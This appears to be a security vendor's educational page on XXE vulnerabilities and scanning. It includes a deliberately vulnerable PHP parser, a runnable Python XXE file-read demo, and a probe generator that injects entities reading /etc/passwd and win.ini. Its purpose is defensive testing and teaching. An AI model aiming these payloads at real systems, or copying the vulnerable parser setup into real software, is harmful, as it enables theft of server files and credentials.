Generic XXE Vulnerability Scanner
XML external entity injection (XXE) is a vulnerability in applications that parse XML with a parser configured to process document type definitions (DTDs) and resolve external entities. An attacker who controls the XML supplies a DOCTYPE that declares an entity pointing at a local file or a URL; when the parser expands it, the attacker can read files the application can access, make the server send requests to internal systems (server-side request forgery), or exhaust its resources with recursive entity expansion. Whether XXE escalates to code execution depends on the parser and platform (for example PHP's expect:// stream wrapper when that extension is loaded); it is not a given, and XXE by itself does not let an attacker write files.
Short Info
Level: High
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 3 days
Scan only one: URL, Request
Toolbox: -
What's the impact of XXE?
XXE vulnerabilities appear wherever an application hands user-controlled XML to a parser: web services that accept XML or SOAP requests, SAML single sign-on endpoints, and document management systems that process formats built on XML, such as SVG images or Office documents.
The impact depends on what the parser is allowed to do. Typically an attacker can read any file the application process can read, such as configuration files holding database credentials, API keys or password hashes, and can reach internal services from the server's position on the network. Entity expansion payloads can also exhaust memory or CPU and deny service. Code execution and full server takeover are possible only in specific configurations, but where they are, the attacker gains the privileges of the application process.
Sample Vulnerable XXE Application
<?php
// Intentionally vulnerable: the XML comes from a user-supplied file and is
// parsed with entity substitution enabled (LIBXML_NOENT), so an entity such as
// <!ENTITY xxe SYSTEM "file:///etc/passwd"> declared in the document's DOCTYPE
// is fetched and its contents are echoed back to the user.
$content = file_get_contents($filepath);
$dom = new DOMDocument();
$dom->loadXML($content, LIBXML_NOENT);
$xml = simplexml_import_dom($dom);
echo $xml;
Sample XXE Attack
Let's take a look at a sample XXE attack. In this example, the attacker submits an XML document whose DOCTYPE declares an external entity pointing at a file on the server (for example file:///etc/passwd) and references that entity inside an element the application displays. When the application parses the document, the parser fetches the file and substitutes its contents for the entity reference. The following steps illustrate how the attack works:
- The attacker submits the crafted XML document to the application.
- The application passes the document to an XML parser that resolves external entities.
- The parser reads the file named in the entity's SYSTEM identifier and substitutes its contents for the entity reference.
- If the application reflects that element in its response or in an error message, the attacker reads the file contents directly; otherwise the contents can often still be exfiltrated out of band through a parameter entity that sends them to an attacker-controlled server.
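The four steps above, as an added, runnable example that is not code from the original page: Python's standard-library xml.sax parser is used as the target application, once with external general entities enabled (the vulnerable configuration) and once with them disabled (the hardened one), and the same file-read payload is fed to both. The element names, the entity name xxe and the secret written to a temporary file are constructed for the demonstration; the temporary file stands in for /etc/passwd so the example runs on any host with a POSIX path layout.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the character data of the document, i.e. the value the
    sample application would echo back to the user."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_user_xml(xml_bytes, resolve_external_entities):
    """Parse untrusted XML with the standard-library SAX parser and return
    its text content.

    resolve_external_entities=True reproduces the vulnerable configuration:
    a SYSTEM entity declared in the DOCTYPE is fetched (here over file://)
    and its content is substituted into the document.  False is the hardened
    setting (and the default since Python 3.7.1): the reference expands to
    nothing and no file is read.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def build_file_read_payload(target_path):
    """Step 1 of the attack: an XML document whose DOCTYPE declares an
    external entity pointing at a local file (POSIX path assumed) and
    references it inside a field the application displays."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE user [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<user><name>&xxe;</name></user>\n"
    ).encode()


def demo():
    """Run the same payload through both parser configurations and return
    what each one echoes.  A temporary file holding a constructed secret
    stands in for /etc/passwd so the demo does not depend on the host."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("db_password=correct-horse-battery-staple\n")  # constructed sample
        secret_path = f.name
    try:
        payload = build_file_read_payload(secret_path)
        leaked = parse_user_xml(payload, resolve_external_entities=True)
        safe = parse_user_xml(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked.strip(), safe.strip()


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser echoed:", repr(leaked))
    print("hardened parser echoed:  ", repr(safe))
```

Disabling external entity resolution is the minimum; the more robust fix for any parser is to reject documents that carry a DOCTYPE at all when the application never needs one, which also removes the entity-expansion denial-of-service surface.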
XXE vulnerabilities can be difficult to detect because the XML parsing is often indirect: it happens inside SOAP, SAML, RSS, SVG or Office-document handling rather than in code that visibly accepts XML, and many widely used parsers resolve external entities unless explicitly told not to. Reviewing user input is not a sufficient defence on its own; the parser itself should be configured to disable DTD processing, or at least external entity resolution, and that setting should be verified for every library that touches untrusted XML.
How to scan for XXE Vulnerability?
There are a number of scanners that can be used to scan for XXE vulnerabilities. Some of the most popular ones include:
Burp Suite: Burp Suite's active scanner checks web applications for XXE, including out-of-band detection through Burp Collaborator. The scanner is only available in Burp Suite Professional (listed here at 399 dollars per user for a one-year subscription); the free Community edition does not include it.
XXEinjector: XXEinjector is an open-source tool dedicated to XXE. It does not scan for other vulnerability classes; it automates the exploitation of a suspected XXE, supporting both direct (in-band) and out-of-band file retrieval.
OWASP Zed Attack Proxy (ZAP): OWASP ZAP is a free, open-source tool that scans web applications for a variety of vulnerabilities, including XXE. Its active scan includes an "XML External Entity Attack" rule.
S4E Online XXE Scanner Tool: a free online tool to detect XXE in web applications. Nothing has to be downloaded or installed; register and use it.
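What the in-band check inside such scanners looks like, as an added example written for this page rather than the code of any of the tools listed: an existing XML request body is turned into a probe by prepending a DOCTYPE with an external entity and pointing the first leaf element at it, the probe is sent, and the response is searched for content that only the requested file would produce. The probe list, the marker expressions and the simulated_linux_target function are constructed for the demonstration; in use, the send callable would be an HTTP client aimed at the endpoint under test.

```python
import re
import xml.etree.ElementTree as ET

# Files a scanner commonly asks the target to read, each paired with an
# expression that confirms the file content came back in the response.
# Constructed for this example; the probe list of any real scanner may differ.
FILE_PROBES = {
    "file:///etc/passwd": re.compile(r"root:[x*]?:0:0:"),
    "file:///c:/windows/win.ini": re.compile(r"\[(fonts|extensions|files)\]", re.I),
}

# Swapped for the entity reference after serialising, because ElementTree
# would otherwise escape a literal '&' in the element text.
PLACEHOLDER = "XXE-PLACEHOLDER-5f1c"

# Constructed sample request body of the kind a legitimate client would send.
SAMPLE_REQUEST = "<user><name>alice</name><role>viewer</role></user>"


def inject_xxe(request_body, system_id, entity="xxe"):
    """Turn a legitimate XML request body into an XXE probe.

    A DOCTYPE declaring an external entity is prepended and the text of the
    first leaf element is replaced by a reference to it, so whatever the
    application does with that field now happens to the fetched file.
    """
    root = ET.fromstring(request_body)
    leaf = next(el for el in root.iter() if len(el) == 0)
    leaf.text = PLACEHOLDER
    root_name = root.tag.split("}")[-1]  # drop a namespace URI prefix if present
    serialised = ET.tostring(root, encoding="unicode").replace(PLACEHOLDER, f"&{entity};")
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root_name} [<!ENTITY {entity} SYSTEM "{system_id}">]>\n'
        f"{serialised}"
    )


def entity_expanded(system_id, response_text):
    """True when the response carries content only the requested file would produce."""
    return FILE_PROBES[system_id].search(response_text) is not None


def scan(request_body, send):
    """Send one probe per target file and return the system ids whose
    content was reflected.  send(probe_body) -> response_text is supplied
    by the caller (normally an HTTP client for the endpoint under test)."""
    confirmed = []
    for system_id in FILE_PROBES:
        probe = inject_xxe(request_body, system_id)
        if entity_expanded(system_id, send(probe)):
            confirmed.append(system_id)
    return confirmed


def simulated_linux_target(probe):
    """Constructed stand-in for a vulnerable Linux endpoint that greets the
    user by the <name> field after its parser has expanded the entity."""
    if "/etc/passwd" in probe:
        return "Hello root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
    return "Hello "  # the Windows path does not exist on this host


if __name__ == "__main__":
    print(inject_xxe(SAMPLE_REQUEST, "file:///etc/passwd"))
    print("confirmed:", scan(SAMPLE_REQUEST, simulated_linux_target))
```

This in-band check only fires when the injected field is reflected in the response; for blind cases a scanner falls back to an out-of-band probe, declaring a parameter entity that points at a unique URL on a server the scanner controls and treating any request arriving there as confirmation, which this example does not implement.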